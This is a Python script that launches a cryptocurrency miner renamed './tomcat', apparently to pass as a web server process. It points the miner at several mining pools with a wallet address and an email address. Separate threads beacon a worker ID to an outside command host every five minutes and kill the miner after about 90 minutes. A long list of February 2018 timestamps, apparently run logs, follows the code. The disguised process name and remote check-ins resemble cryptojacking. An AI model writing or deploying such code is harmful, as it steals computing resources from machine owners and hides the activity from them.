import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:58:05.143512
#2018-02-17 16:46:07.044503
#2018-02-17 18:35:06.642046
#2018-02-17 20:23:06.239955
#2018-02-17 22:10:06.599449
#2018-02-17 23:54:05.312918
#2018-02-18 01:44:02.076473
#2018-02-18 03:31:03.826513
#2018-02-18 05:18:07.761040
#2018-02-18 07:11:02.092988
#2018-02-18 08:59:06.118593
#2018-02-18 10:46:05.395428
#2018-02-18 12:33:06.648089
#2018-02-18 14:20:08.554638
#2018-02-18 16:11:06.609636
#2018-02-18 18:01:06.084556
#2018-02-18 19:47:03.934254
#2018-02-18 21:29:07.814778
#2018-02-18 23:18:05.119251
#2018-02-19 01:06:05.274178
#2018-02-19 02:52:05.998232
#2018-02-19 04:40:01.767654
#2018-02-19 06:24:06.411752
#2018-02-19 08:13:04.731196
#2018-02-19 10:03:04.414542
#2018-02-19 11:52:03.893784
#2018-02-19 13:40:04.543882
#2018-02-19 15:27:06.332291
#2018-02-19 17:16:05.101491
#2018-02-19 19:05:09.908381
#2018-02-19 20:52:06.457420
#2018-02-19 22:41:01.584744
#2018-02-20 00:25:01.748395
#2018-02-20 02:12:04.314630
#2018-02-20 04:02:01.655433
#2018-02-20 05:45:02.182756
#2018-02-20 07:30:09.011557
#2018-02-20 09:15:06.974188
#2018-02-20 10:57:09.436427
#2018-02-20 12:44:05.837471
#2018-02-20 14:29:02.163410
#2018-02-20 16:13:05.270051
#2018-02-20 17:57:10.880165
#2018-02-20 19:49:07.155865
#2018-02-20 21:38:06.599262
#2018-02-20 23:18:07.899842
#2018-02-21 01:04:06.599688
#2018-02-21 02:50:09.467378
#2018-02-21 04:39:01.720931
#2018-02-21 06:26:06.707929
#2018-02-21 08:10:14.871697
#2018-02-21 09:57:02.116613
#2018-02-21 11:44:05.763952
#2018-02-21 13:36:04.059921
#2018-02-21 15:20:03.800829
#2018-02-21 17:12:07.398916
#2018-02-21 18:59:06.367785
#2018-02-21 20:49:06.423464
#2018-02-21 22:34:03.760938
#2018-02-22 00:24:01.768361
#2018-02-22 02:12:07.557002
#2018-02-22 03:59:07.302025
#2018-02-22 05:46:06.035264
#2018-02-22 07:31:05.967096
#2018-02-22 09:18:06.221811
#2018-02-22 11:05:02.844544
#2018-02-22 12:50:09.918893
#2018-02-22 14:36:01.335894
#2018-02-22 16:21:04.488721
#2018-02-22 18:09:06.839385
#2018-02-22 19:59:01.569143
#2018-02-22 21:48:09.336350
#2018-02-22 23:35:08.262241
#2018-02-23 01:23:01.487263
#2018-02-23 03:09:06.619371
#2018-02-23 04:56:05.680004
#2018-02-23 06:40:03.938583
#2018-02-23 08:28:07.533285
#2018-02-23 10:42:06.898267
#2018-02-23 12:39:05.538344
#2018-02-23 14:24:05.203560
#2018-02-23 16:14:10.155492
#2018-02-23 18:01:08.794033
#2018-02-23 19:46:11.283322
#2018-02-23 21:28:03.852831
#2018-02-23 23:16:08.401852
#2018-02-24 01:06:06.844051
#2018-02-24 02:57:06.202518
#2018-02-24 04:45:08.961169
#2018-02-24 06:31:05.188020
#2018-02-24 08:19:04.268767
#2018-02-24 10:03:06.498246
#2018-02-24 12:01:04.377752
#2018-02-24 13:48:01.611568
#2018-02-24 15:44:06.099095
#2018-02-24 17:39:07.515626
#2018-02-24 19:24:07.500233
#2018-02-24 21:14:06.687840
#2018-02-24 23:51:01.633774
#2018-02-25 03:42:06.465280
#2018-02-25 07:27:05.773821